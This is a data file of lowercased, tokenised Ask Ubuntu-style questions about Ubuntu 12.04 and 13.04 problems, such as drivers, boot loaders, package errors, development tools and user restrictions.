315631	wireless and trackpad disabled in ubuntu 13.04 after update	last week on ubuntu 13.04 , i ran a sudo apt-get dist-upgrade . everything seemed fine until i rebooted . suddenly , my trackpad stopped functioning , and i could n't view available wireless networks anymore . i 've run this command many times to update packages , and i have no idea how to go about diagnosing the problem . i also do n't have access to a wired network to see if running another update fixes the issue . i do have a live usb but would n't know how to go about using it to resolve the problem . any help would be greatly appreciated !
315635	suspend does n't work on dual boot ubuntu 13.04 and mac os x	i have dual booted by macbook pro retina display with ubuntu 13.04 , using efi boot manager refind . it works great , except for the suspend function which is broken in both mac os and ubuntu . if i click suspend or close the lid , it wo n't wake back up and i have to switch it off and on a couple of times before it 'll boot up . i saw another question here ( refind breaks standby mode on macbook air 5.2 ) had a similar problem and was suggested trying refit . my questions are : 1 ) refit does n't appear to be maintained anymore . is there a specific version that 's recommended for solving the boot problem and does anyone have experience with other issues that may occur using the unmaintained version ? 2 ) will i need to reinstall ubuntu to try refit . can anyone recommend any tutorials for switching boot manager ?
315637	using boot manager app to multi boot ubuntu touch in android	i am trying to boot ubuntu touch on android using boot manager app by init winit app.have anybody tried booting ubuntu touch using bbootmanager app in android ? any help/tutorial on it ?
315640	how do i completely remove evolution ?	the looping of evolution factories slow the system to sudden and lengthy halts . when i access the system monitor i can stop the individual processes that cause the problem . these processes are as follows ; evolution-source-registry notably , evolution-addressbook-factory once evolution-addressbook-factory is stopped the processes are eventually replaced by similarly named processes , but the looping stops . when i connect to thunderbird it slows substantially . initially i used evolution mail when running ubuntu 12.10 but removed it and have been using thunderbird . my laptop specs are : ubuntu 13.04 32-bit 2.0 ghz ( dual core , both cores at 2.0 ghz ) 1gb ram after carrying out the recommended procedures for complete removal i recieved a cache read error after removing evolution from the package manager entirely . re-downloading the packages in the package manager enabled email recognition and produced the error seen in the screenshot .
315642	shortcut key for switching into desktop	in windows there is a shortcut key to minimize a game . it 's like ctrl + alt + tab or ctrl + alt + del to join taskmanager or sign out of your account . it that possible in ubuntu ? i tried ctrl + super + d. it works but not if i ve open a game .
315643	ld_preload fails with skype	i 'm trying to run skype on ubuntu 13.04 , and getting a black void instead of my webcam input , when my webcam works with other applications such as cheese . the traditional solution is to run ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype however , this is now failing to work , with $ ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype error : ld.so : object '/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . $ locate v4l1compat.so /usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so file `which skype` /usr/bin/skype : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0xe7a4372f77f31bca55d7b0e26422b8901d916e51 , stripped i have also tried without ld_preloading anything . why might ld_preload be failing and has anyone else had any luck ?
315646	update-java-alternatives vs update-alternatives -- config java	on ubuntu 12.04 lts i have installed sun 's jdk7 , eclipse , and the arduino ide . i want the arduino to use openjdk 6 and want eclipse to use sun 's jdk 7 . from my understanding i need to manually choose which java to use before running each application . this led me to the update-java-alternatives -l command . when i run this i only see the following : java-1.6.0-openjdk-amd64 1061 /usr/lib/jvm/java-1.6.0-openjdk-amd64 but when i run 'update-alternatives -- config java ' i see the following : *0 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java auto mode 1 /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java manual mode 2 /usr/lib/jvm/jdk1.7.0/bin/java manual mode 3 /usr/lib/jvm/jre1.7.0/bin/java manual mode i do n't understand why the update-java-alternatives does n't display the same 3 options . i also do n't understand how to switch between openjdk6 and jdk7 . how i can go about using the openjdk6 for arduino development and sun jdk7 for eclipse/android development ?
315647	maas nodes stuck on `` maas-enlisting-node ''	i am trying to set up an maas cluster , but am having some issues adding nodes . the nodes boot up from the tftp server on the master server , display a login screen ( with the hostname `` maas-enlisting-node '' ) and stop . i can not log in with ubuntu/ubuntu or with my ssh keys . the maas server is running dhcp and dns on the network , and the tftp boot appears to be loading everything without issues ( i can screencap if you want ) any ideas what 's going wrong ? thanks !
315655	`` trash '' equivalent for 12.04	i recently updated my ubuntu version to 12.04 . i have aliased rm to the command trash , and now that i have upgraded , there is no longer a command called trash . is there an equivalent for 12.04 ? i just want to move files to a trash can before i delete them , so i do n't go delete my all of my code , which i have done before .
315658	how do i get a belkin n52te keyboard working ?	i have this n52te keyboard from when i used it on my windows , it works out of box fine but it only acts as the left side of a normal keyboard , is there a way to edit custom buttons on linux ? there is no official driver for linux .
315660	error : no such device : 9fa0fdb-791f-4d74-b69f-0369315c9d1a . grub rescue >	i have a sony viao desktop that i ran 13.04 live cd upon and worked flawlessly . installed successfully from within the live cd with the `` alongside windowns 7 option ) and it prompted for a restart , which i did . then the error ( title above ) displayed and nothing else .
315662	how to use gnome 's extensions	i tried asking this in the unix & linux stackexchange , but this may be a better place . i have been trying to install some gnome extensions from the site https : //extensions.gnome.org . i get the dialogue asking if i want to install , but after i select yes , it fails silently . this is the behavior using either firefox or chromium . i have checked to make sure the gnome shell integration plugin is installed and enabled for both chromium and firefox . my operating system in ubuntu 12.10 , and my version of gnome is 3.6.3.1 . i have made sure ( using sudo apt-get update ) that everything is up-to-date . i have tried restarting , but to no avail . what am i doing wrong , and how do i fix this ( or what is a good workaround ) ? note : i have the gnome-tweak-tool installed , and it does not show any extensions as installed . there is nothing happening after i confirm that i want to to download the extension . edit : extensions are now working . i do not know why . maybe it was restarting . i will mark the below answer as accepted because it gives good information that may help others . i would suggested to anyone in my position just making sure everything is up-to-date , restarting , and then checking every so often to see if it is working .
315667	how to fix a `` read only '' hard drive issue when trying to install ubuntu ?	so i am trying to install ubuntu 13.04 on my laptop and currently have it mounted on a flash drive . when i select the `` install ubuntu '' program , it fails saying that my hard drive is read-only . how do i make it so that it is not read-only from inside ubuntu ? also , i am a complete noob with ubuntu so i have to be guided step by step . thank you !
315668	kubuntu not showing eth0	i just installed kubuntu 12.04.2 and do not have an internet connection . i also can not access the desktop and only have the terminal . when i enter xlcock i get error : ca n't open display : . i believe this is because i do not have the correct drivers and need to download them ... using the internet which i ca n't access . so here 's what 's going on ... ifconfig gives : lo link ecap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overrruns:0 frame:0 tx packets:16 errors:0 dropped:0 overrruns:0 frame:0 collisions:0 txqueuelen:0 rx bytes:1296 ( 1.2 kb ) tx bytes:1296 ( 1.2 kb ) wlan0 link encap : ethernet hwaddr 68:17:29:58:49:4a up broadcast multicast mtu:1500 metric:1 rx packets:16 errors:0 dropped:0 overrruns:0 frame:0 tx packets:16 errors:0 dropped:0 overrruns:0 frame:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lspci -nnk gives : 07:00.0 network controller [ 0280 ] intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 ) subsystem : intel coporation centrino wireless-n 2230 bgn [ 8086:4062 ] kernel driver in use : iwlwifi kernel modules : iwlwifi 0d:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) subsystem : toshiba america info systems device [ 1179 : fa77 ] i believe this means that it is using the ethernet connection but thinks it is a wireless connection . sudo lshw -class network gives : *-network description : wireless interface product : centrino wireless=n 2230 ... *network unclaimed description : ethernet controller product : ar8161 gigabit ethernet i want to get the internet working so i can fix the gpu driver , etc . but i ca n't seem to get it working even though i have my ethernet cable plugged in ( and i 'm sure it is working ) .
315671	installed ubuntu 13.04 but no wireless or wired connection available	after having installed ubuntu 13.04 i can not connect to the internet wirelessly or wired ? can only connect to internet by using `` try ubuntu '' via ethernet cable , ive tried seeking help in so many different ways yet getting no positive outcome at all , will someone please explain why i can only connect with ethernet while i have the cd in the tray ? ive also tried downloading b43 drivers to connect to the internet but apparently i dont have enough disk space , what is going on here ? i have the disk in the tray now at the screen where you can either try or install , if someone could give me a step by step from here it would probably cut out all this hassle of me not knowing whats going on
315672	ubuntu vps hangs constantly when unpacking anything ! apt-get or dpkg hangs !	i have recently purchased a vps , as we have decided to move from a godaddy shared hosting account , to something more powerful , and flexible . the server this is on is running openvz from what i understand ; i have chosen ubuntu 12.04 64bit as my host operating system . anyway , everything seemed to have went okay , so i left it for a few days , and now i am trying to actually set it up . i logged on , have myself a unix user besides root , and moved him to the sudo group . i needed to install lamp , so i installed tasksel , and noticed it took a very , very long time . figuring it might have been a borked sources.list i let it finish , and rebuilt the file . ran apt-get update . next was onto installing webmin to control the server . the package is about 20 mb , and had some prerequisites . after a horrendously long setup of about 1.5 hours , and after just about hammer fist punching my laptop , i logged in to webmin : inside webmin it has informed me i have some system critical updates . understandable , this is my first real time using the server . so i update my system : this time , with about 30+ updates , i have noticed something : it is constantly hanging on unpacking packages , and also strangely on the line that says something about man-db . and on another note : thinking it could be write speeds to the shared drive , i compared a command to test this against my private home server at home , but everything looks fine : ( : s ? ( the vps below ) steven @ rapidwebs : ~ $ dd if=/dev/zero of=/tmp/output bs=8k count=10k ; rm -f /tmp/output 10240+0 records in 10240+0 records out 83886080 bytes ( 84 mb ) copied , 0.226933 s , 370 mb/s ( personal server ) steven @ appsrv : ~ $ dd if=/dev/zero of=/tmp/output bs=8k count=10k ; rm -f /tmp/output 10240+0 records in 10240+0 records out 83886080 bytes ( 84 mb ) copied , 0.690962 s , 121 mb/s any help would be greatly appreciated !
315673	how do i check which process is consuming a lot of hard disk reading and writing	sometimes my laptop is very slow and i found the hard disk light is not blink as normal . maybe there is a way to check the hard disk speed usage , so i could kill the process .
315675	ubuntu 13.04 tv setup	i 'm new to ubuntu . how do install setup tv on version 13.04 ? ca n't seem to find tv setup . thanks , steve .
315678	how do i make a random amount of an elements in qml	i am trying to make an app with qml for ubuntu touch that is similar to the game avalanche , and am unsure how to go about inserting a varying number of falling blocks . all of the blocks will be the same picture , but will have different sizes and ids . the blocks will also be deleted when they go off screen ( so they do n't fill up any more ram to store their sizes , ids , etc . when they are no longer needed ) . here is the template for the blocks that i would like to use : image { id : block0 //the first block will be 0 , the second 1 , the third 2 , and so on source : `` block.png '' height : units.gu ( math.floor ( math.random ) * 5 + 1 ) width : height x : units.gu ( math.floor ( math.random ( ) * ( 75 - width ) ) ) } so , how can i have this code snippet be written to and deleted from the qml file when the game is played ? i would like to do this with javascript so it will be easier to make the ids and store them in an array to easily access information . sorry if this is difficult to understand , and thanks for the help !
315690	permission denied to move files	i want to clear space on my computer in order to download drivers for my internet , so i tried moving files to a different location , unfortunately i dont have permission to do this , how do i change this , i should point out that i am not logged in , i think im a guest or something because if i log in i can not gain access to the internet to download the drivers that i need , so im using the cd and using the try ubunt feature to try achieve downloading the drivers . this is very frustrating for me as im new and have not got a clue how to do this
315695	ubuntu for lenovo thinkpad tablet 2 which one ?	ubuntu is already working on five of my laptops a 10+++ i would like to know which ubuntu can i install on my lenovo thinkpad tablet 2 i dont want to make a mistake and would like to know first thanks great job ! ps , i converted 10 people in less then a month to ubuntu 13.04
315697	kubuntu ? what is that.. ?	okay so when i was running the ubuntu installer i found something called `` desktop interface '' . it was apparently selected as ubuntu . i looked at the full set of options and found out that there 's kubuntu there ! i want to know what kubuntu is . if i can get it on virtualbox then how ? i want to try out kubuntu but i do n't want to over write my ubuntu with kubuntu .
315700	grub rescue ... error : elf header smaller than expected	i 've searched everywhere , tried everything i 've read here , tried boot-repair ... keep getting `` an error occurred during the repair . '' attempting duel boot with windows 7 & ubuntu 12.10 latest pastebin ... http : //paste.ubuntu.com/5839220/ any help would be appreciated .
315702	wubi downloads iso even though it 's already there	i am trying to install ubuntu on windows 8 . my system does not have the secureboot and uefi option . i downloaded the ubuntu 12.04 iso from the website . it contains wubi.exe , but when i run wubi it starts downloading the ubuntu iso again . i tried the option of putting the iso and wubi.exe in an empty folder and then running it , but it still downloads a new iso . why ca n't it use the iso i already have ?
315703	does ubuntu support sata drives in ahci mode ?	i have a current installation of ubuntu 13 . will it boot if i switch my sata controller to ahci in bios ? ( i installed ubuntu in ide mode ) i have to wait until i fix my grub ( windows ate it ) , so i thought i 'd take a poll here first in case there are any precautions . i ask , because it was a royal pita to do it in windows . will i need to reinstall ubuntu to enable this ? i do n't mind doing that since it was just installed and i having nothing on it yet , and i kinda botched the install anyway .
315705	transmission wo n't start	when i launch transmission from unity it wo n't start the first time . the second time i launch it , it takes a couple of minutes to start . i tried to launch it from the terminal and i got this message , `` ( transmission-gtk:9225 ) : glib-gio-critical ** : timeout was reached '' i already tried reinstalling it , but it did n't work . i 'm using ubuntu 12.04
315712	upgrade to 13.04 was not successful . gstreamer not working . what do ?	i finally decided to upgrade to 13.04 . in the middle of the installation my computer froze completely , and so i decided to force quit . i log back on , and notice that the login says 13.04 , but not everything was updated . so i run the software updater . some of the stuff gets updated , but not everything , i suppose . i try to run rhythmbox , but it says that it 's not able to form playback , and that the gstreamer was messed up , and to please check installation . i do n't know what other bugs maybe running . that 's just the first i 've encountered . the software updater wo n't let me update anymore because it says the updates need authentication .
315713	`` compiler crashed with code : 1 . '' trouble compiling monodevelop 4	i 'm trying to compile the latest version of monodevelop ( 4.0.9 ) on my ubuntu 12.04 and i 'm facing errors i can not overcome . here are my machine 's configurations : os : ubuntu 12.04 64-bit mono : version 3.0.12 and here are the commands that i ran to download monodevelop : $ git clone git : //github.com/mono/monodevelop.git $ cd monodevelop $ git submodule init $ git submodule update and afterwards to compile : ./configure -- prefix=`pkg-config -- variable=prefix mono` -- profile=stable make then i faced the following errors ( sorry if it 's long ) : ... building ./main.sln xbuild /verbosity : quiet /nologo /property : codepage=65001 ./main.sln /property : configuration=debug /home/mehran/git/monodevelop/main/main.sln : warning : do n't know how to handle globalsection monodevelopproperties.debug , ignoring . : warning cs1685 : the predefined type `system.runtime.compilerservices.extensionattribute ' is defined in multiple assemblies . using definition from `mscorlib' /usr/lib/mono/4.0/microsoft.csharp.targets : error : compiler crashed with code : 1. : warning cs1685 : the predefined type `system.runtime.compilerservices.extensionattribute ' is defined in multiple assemblies . using definition from `mscorlib' editor/idocument.cs ( 98,30 ) : warning cs0419 : ambiguous reference in cref attribute `getoffset ' . assuming `icsharpcode.nrefactory.editor.idocument.getoffset ( int , int ) ' but other overloads including `icsharpcode.nrefactory.editor.idocument.getoffset ( icsharpcode.nrefactory.textlocation ) ' have also matched patternmatching/inode.cs ( 51,37 ) : warning cs1574 : xml comment on `icsharpcode.nrefactory.patternmatching.patternextensions.match ( this icsharpcode.nrefactory.patternmatching.inode , icsharpcode.nrefactory.patternmatching.inode ) ' has cref attribute `patternmatching.match.success ' that could not be resolved textlocation.cs ( 35,23 ) : warning cs0419 : ambiguous reference in cref attribute `editor.idocument.getoffset ' . assuming `icsharpcode.nrefactory.editor.idocument.getoffset ( int , int ) ' but other overloads including `icsharpcode.nrefactory.editor.idocument.getoffset ( icsharpcode.nrefactory.textlocation ) ' have also matched typesystem/fulltypename.cs ( 87,24 ) : warning cs0419 : ambiguous reference in cref attribute `reflectionhelper.parsereflectionname ' . assuming `icsharpcode.nrefactory.typesystem.reflectionhelper.parsereflectionname ( string ) ' but other overloads including `icsharpcode.nrefactory.typesystem.reflectionhelper.parsereflectionname ( string , ref int ) ' have also matched typesystem/inamedelement.cs ( 59,24 ) : warning cs0419 : ambiguous reference in cref attribute `reflectionhelper.parsereflectionname ' . assuming `icsharpcode.nrefactory.typesystem.reflectionhelper.parsereflectionname ( string ) ' but other overloads including `icsharpcode.nrefactory.typesystem.reflectionhelper.parsereflectionname ( string , ref int ) ' have also matched typesystem/itype.cs ( 50,26 ) : warning cs1584 : xml comment on `icsharpcode.nrefactory.typesystem.itype ' has syntactically incorrect cref attribute `iequatable { itype } .equals ( itype ) ' typesystem/itype.cs ( 319,38 ) : warning cs1580 : invalid type for parameter `1 ' in xml comment cref attribute `getmethods ( predicate { iunresolvedmethod } , getmemberoptions ) ' typesystem/typekind.cs ( 61,17 ) : warning cs1580 : invalid type for parameter `1 ' in xml comment cref attribute `itype.getnestedtypes ( predicate { itypedefinition } , getmemberoptions ) ' typesystem/specialtype.cs ( 50,52 ) : warning cs1580 : invalid type for parameter `1 ' in xml comment cref attribute `itype.getnestedtypes ( predicate { itypedefinition } , getmemberoptions ) ' /usr/lib/mono/4.0/microsoft.csharp.targets : error : compiler crashed with code : 1 .
315714	retain only dependencies of a given package	i am trying to have a minimal version of ubuntu , having only those packages necessary to run mininet . so , i would like a solution , where i would be able to uninstall all the packages from the system , except those that are needed to run mininet . a much more preferable solution would be to be able to create a new iso , with mininet and all it 's dependencies . is there any program out there which is already capable of this ? if not please guide me on how i can solve my problem ? note : i need to retain not only the direct dependencies of mininet , but also dependencies of dependencies and so on . the final system should be able to run mininet without a hitch .
315716	uninstalling and reinstalling 13.04 to a different hard drive	i recently downloaded and installed ubuntu 13.04 , the problem is that i deleted windows operating system by mistake so now only have ubuntu to work off of , im trying to uninstall and reinstall ubuntu to a different hard drive as the one it is currently installed on doesnt have sufficient disk space , could someone instruct how to do this , explaining the partitioning part too as im new and dont fully understand it
315722	how do you install and configure tuxguardian in ubuntu 12.04 ?	can anyone guide me on the process to install tuxguardian in ubuntu 12.04 ? its a freeware application available at : http : //tuxguardian.sourceforge.net
315724	how to prevent ubuntu from making auto-updates ?	i have the following problem . recently i have installed vim ( which i compiled myself , as the one in the ubuntu repositories are old ) . with it i installed cscope and you-complete-me plugins . now everytime ubuntu checks for updates , it wants to `` upgrade '' my vim and the vim you-complete-me plugin stops working ( because it actually downgrades my vim ... ) . how can i tell ubuntu to mind it 's own bussiness and stop `` upgrading '' my vim ? i do n't want to deselect boxes each time there is some system update ... update : i have installed vim using the steps provided here : https : //github.com/valloric/youcompleteme/wiki/building-vim-from-source
315725	gdb uses wrong python	when i launch gdb ( on ubuntu 12.04 lts ) it immediately crashes with the following output : blockquotetraceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 562 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 544 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 271 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 246 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 236 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 577 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 476 , in get_config_vars _init_posix ( _config_vars ) file `` /usr/lib/python2.7/sysconfig.py '' , line 337 , in _init_posix makefile = _get_makefile_filename ( ) file `` /usr/lib/python2.7/sysconfig.py '' , line 331 , in _get_makefile_filename return os.path.join ( get_path ( 'platstdlib ' ) .replace ( `` /usr/local '' , '' /usr '' ,1 ) , `` config '' + ( sys.pydebug and `` _d '' or `` '' ) , `` makefile '' ) attributeerror : 'module ' object has no attribute 'pydebug' from these two similar questions gdb can not run due to python error http : //stackoverflow.com/questions/10641201/attributeerror-module-object-has-no-attribute-pydebug it seems gdb catches the wrong python install ? how do i know which python gdb should use and where do i set which is used ? i have one python in /usr/lib/python2.7 and one in /opt/ros/fuerte/lib/python2.7 . i have previously used gdb successfully on this machine . thanks !
315726	ubuntu partition after installation	i have already installed ubuntu 12.04 with all the space allocated to just one drive in which ubuntu is installed . i want to create partitions now . i have a bootable usb of ubuntu 12.04 . do i need to burn gparted on that usb so as to make partitions . i have installed almost what i wanted and do n't want to lose anything now .
315728	switch from windows 7 to ubuntu 13.04 question	i am currently switching from windows 7 to ubuntu 13.04 . when i download the .iso file from ubuntu.com i notice that it said amd64 and i have a intel cpu . is there a certain version i need for intel chips .
315729	design standard for `` about '' and `` options ''	i have seen that in many ubuntu touch projects that the way to do `` options '' ( or `` settings '' ) and `` about '' is done with a tab . is that good for the design guideline of ubuntu touch ? is there a standard ? i really think every projects should follow a line ( like gnome does ) so the users do n't get lost between some app with a toolbar action for settings and others with a tab and others called `` options '' ... also what about the guideline for the `` about '' information , should we put it into a tab ? and how ? is there a standard like there is for gnome ? also where should be a `` new game '' button of a game app , in a toolbar or in the tab ? this things should be nice to fix so that app can be easy to understand for all users . standards are better than an app mess ...
315733	clickable emails in label	in my app ( ite-missa-est ) and in the sudoku-app we are wondering how to make an email clickable as a url link is . in a label the code for a link is : label { //translators : here is the context text : i18n.tr ( `` bugs and traductions : `` ) + `` < a href=\ '' % 1\ '' > launchpad < /a > '' .arg ( `` https : //launchpad.net/ite-missa-est '' ) onlinkactivated : qt.openurlexternally ( link ) } what is the code for an email ? it might be very close . thanks .
315739	php fatal error : call to undefined function mysql_connect ( )	i 'm trying to connect my php page to mysql database , but i 'm getting this error : php fatal error : call to undefined function mysql_connect ( ) i 'm working on ubuntu 11.10 mysql 5.5 and php 5.3 . i have also installed the apache2 server , and it works fine . i tried to install the php5-mysql module using the following command : sudo apt-get install php5-mysql i get this error : the following packages have unmet dependencies : php5-mysql : depends : php5-common ( = 5.3.6-13ubuntu3.1 ) but 5.3.6-13ubuntu3.9 is to be installed e : unable to correct problems , you have held broken packages . i tried to install php5-common again but nothing was successful .
315740	install java on ubuntu 12.04.2	i am trying to install java on ubuntu : $ sudo apt-add-repository ppa : webupd8team/java when i run this i am geting : traceback ( most recent call last ) : file `` /usr/bin/apt-add-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 6 , `` could n't resolve host 'launchpad.net ' '' )
315746	portion of screen freezes on opening transmission [ lubuntu ]	whenever i open transmission ( torrent ) , the top left corner of my screen freezes and covers everything . closing transmission , unfreezes it . it also sometimes happens when i open a .pdf what could be the problem ?
315753	send email using sendmail	i 'm using a script that sends mail using mail utils but now i want to send mail using sendmail can anyone help me as i was not able to get the same result from sendmail as i did from mail . # email settings message_success= '' application backup generated successfully '' message_failure= '' problem occured while generating application backup please verify '' subject= '' application backup status mail '' recipients= '' tarun @ gmail.com '' # check if backup is complete if [ -e `` $ backup_file '' ] ; then echo `` today 's backup file exist 's '' > > $ log_file echo `` $ message_success '' | mail -s `` $ subject '' `` $ recipients '' else echo `` today 's backup file not found '' > > $ log_file echo `` $ message_failure '' | mail -s `` $ subject '' `` $ recipients '' fi i figured out a bit of it and here it is . but where can i define the emails subject . echo `` $ message_success '' | sendmail -f sender @ email.com `` $ recipients ''
315757	how can i set domain name on my localhost ?	i run apache on my ubuntu system in local network . there is more than 100 systems in the network so i want to set domain name on this system . how can i do this ? thanks a lot .
315761	google earth still not working in ubuntu 12.04 32bit	i have ubuntu 12.04 32bit from virtual box and i 'm trying to install google earth . i had installed and reinstalled it from different methods as shown in https : //help.ubuntu.com/community/googleearth . however the results are all the same . google earth will be installed and when i click it does n't launch , it shows the start up logo for like 3 seconds then it disappears . when i launch it from the terminal it shows these error messages : xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . google earth has caught signal 11 .
315764	usb stick became read-only after using pen drive usb installer	yesterday i tried to make my 16gb usb stick bootable with ubuntu 13.04 ( desktop x64 ) . after some time because nothing changed i canceled the progress and decided to burn a dvd . the installation with the dvd worked well but now my usb stick is set to readonly and i ca n't get it fixed . it has no physical switch for setting it readonly . please help me : ] ( and i 'm sorry if my english is n't as well )
315765	recompile qt creator with qt4	qt creator on ubuntu 13.04 has the cursor theme wrong . i 've read this is because qt5 applications do not integrate in ubuntu well . so i want to recompile qt creator using qt4 . i 've downloaded the source with apt-get source qt-creator , and i want to build a package using the methods described in http : //askubuntu.com/a/81889/10263 , but using qmake-qt4 instead of qmake . what should i edit to change the build system to qmake-qt4 ? should i edit debian/rules ?
315767	can not boot ubuntu 13.04 64bit ( dualboot windows-8 )	i was have ubuntu before maybe 10.10 and was working fine . after i buy my new laptop asusx401a with win8-64bit , i was installed ubuntu 13.04 but after restart the computer i got a black screen . and i google it and install boot-repair . and than , just i can log-on to win8 only . if i boot ubuntu i got this message . [ [ 2.238863 kernel panic - not syncing : no init found . try passing init= option to kernel . see linux docmentation/init.txt for guidance. ] ]
315771	why is that updating problem after just installing ubuntu 12.04 ?	e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/
315776	how to costumize terminal on lubuntu like mint	how to customize terminal lubuntu likes mint ? if in mint at myhome directory /home/akhfiya : olivia akhfiya # but in lubuntu : akhfiya @ olivia : /home/akhfiya/ # i confused how to change terminal lubuntu like mint .
315784	how to disable time and date settings for normal users in ubuntu ?	i need to disable time and date setting for standard users in ubuntu . how to do it ?
315788	how do i prevent standard users from creating new user accounts in ubuntu desktop ?	i need to prevent standard users from creating new user accounts in ubuntu-12.04-desktop
315789	set background for page { } element in ubuntu touch	how can i set the background ( picture or color ) of the page { } element in ubuntu touch ? thank you , boaz
315794	how can i prevent standard user from accessing terminal ?	how can i prevent/restrict standard users from accessing terminal in ubuntu-12.04.2-desktop-i386 ? i need to prevent standard users and administrators ( not root account ) in ubuntu user accounts from accessing terminal.i am doing a r & d for `` ubuntu desktop management '' that is to be done through our network monitoring software
315796	tmux becomes unresponsive when tailing a quickly updated file	i have a log file that i am writing a few hundred lines to a second . i want to tail this in a tmux pane . however , when i do this tmux becomes unresponsive - i ca n't change panes or windows and i ca n't even ctrl+c to stop tail . after about 3 or so minutes tail will eventually be killed by ctrl+c and i will regain control - but until then i ca n't do anything ( except change from terminal to another window such as my browser ) . is there anyway to resolve this ? i suspect that the issue is being caused because so many lines are being written to the log file .
315798	how to restrict standard users from accessing system setting in ubuntu-12.04 desktop ?	i need to restrict/prevent standard users from accessing `` system settings '' in ui ?
315799	ubuntu in virtual box not able to connect to internet	host- windowsxp guest- ubuntu 12.10 the host machine has internet connectivity , but i am not able to connect to internet in ubuntu . nat-using this i am able to ping a site , it shows packets sent and received but via browser i am not able to access . bridged- not able to connect . i have a static ip on my host machine and i use a proxy too . please let me know what is going wrong ?
315808	wifi direct p2p-go and p2p-client support in ubuntu	i am trying to get wifi direct working on a laptop with ubuntu 12.04 when i type the command 'iw list ' it does n't show p2p-client or p2p-go under 'supported interface modes.from http : //wireless.kernel.org/en/users/documentation/iw/replace-iwconfig i found that 'iwconfig ' was replaced with 'iw'.does it mean that my hardware does n't have support for wifi-direct or is it just the software ( drivers ) issue ? if is it just sofware issue please help me to find the right drivers which support wifi-direct . here is the info about my ethernet controller from the output of 'lspci ' 02:00.0 ethernet controller : atheros communication inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) 06:00.0 ethernet controller : marvell technology group ltd. 88e8055 pci-e gigabit ethernet controller ( rev 13 )
315811	nginx will not start	i 'm trying to run service nginx restart but i get this error : root @ user /etc/nginx/sites-enabled # service nginx restart restarting nginx : nginx : [ emerg ] bind ( ) to 0.0.0.0:80 failed ( 98 : address already in use ) nginx : [ emerg ] bind ( ) to 0.0.0.0:80 failed ( 98 : address already in use ) nginx : [ emerg ] bind ( ) to 0.0.0.0:80 failed ( 98 : address already in use ) nginx : [ emerg ] bind ( ) to 0.0.0.0:80 failed ( 98 : address already in use ) nginx : [ emerg ] bind ( ) to 0.0.0.0:80 failed ( 98 : address already in use ) nginx : [ emerg ] still could not bind ( ) nginx . how can i fix this problem ? i 'm also running apache .
315817	forward tcp connections with iptables	i receive connections to my server from several ip addresses i want to route these connections just like rinetd does but based on the ip the connection is coming from to connect to a specified host . just like this : ip 10.10.12.1 = > connects to my server = > my server redirects it to 82.12.12.1 ip 10.10.12.2 = > connects to my server = > my server redirects it to 81.121.12.10 etc is it possible or do i need to write my own daemon to achieve this functionality ?
315819	is there a document editor with revision control	i 'm looking for a document editor ( or software ) that 'create a revision ' every time a file saves ( if there are changes ) . it 's preferred to show the difference in a nice way . something like a combination of 'automatic backup s/w ' + meld difference viewer . online example is askubuntu 's revision . ( example )
315820	bluetooth is not working in ubuntu 13.04 on hp pavillion g4-2212 tu	i 'm amateur in ubuntu and using 13.04 . my laptop model is hp pavillion g4-2212 tu . i ca n't turn on bluetooth . can anyone please help ? ? ?
315824	ubuntu 12.04 crashes after selecting 'try without installing ' on windows pc	i 've been following this tutorial http : //www.hanselman.com/blog/installingubuntu104ltsonwindowsvirtualpconwindows7.aspx however , when it comes to selecting 'try without installing ' , the virtual machine simply closes down . edit : in fact it closes down no matter what i select from the menu , 'install ubuntu ' , 'check cd for defects ' ...
315827	ubuntu 13.04 running really slow and hanging	up till recently i have been running 13.04 on my laptop very happily . this morning however , i turned on my laptop to find it running really slow . takes 5 min to load a program and even then the program freezes and i have had 3 system hangs this morning already . the unity desktop appears to run ok but programs do not . things i have tried so far : checking for propitiatory graphics drivers - none shown available ( i have bumblebee running already ) . using the recovery boot options from grub to repair broken packages . recent changes - updated computer , installed some indicator applets which have worked fine for me before . system specs : asus u36s , intel core i5-2450m 2.5ghz , 4gb ram , nvidia geforce 610m-1gb , dual boot win7 & ubuntu 13.04 i 'm a bit of a noob with ubuntu but am happy enough running stuff in terminal if you will advise me on what to run . i 'm just a bit stuck on what do to fix this without a reinstall . thanks a lot for your help .
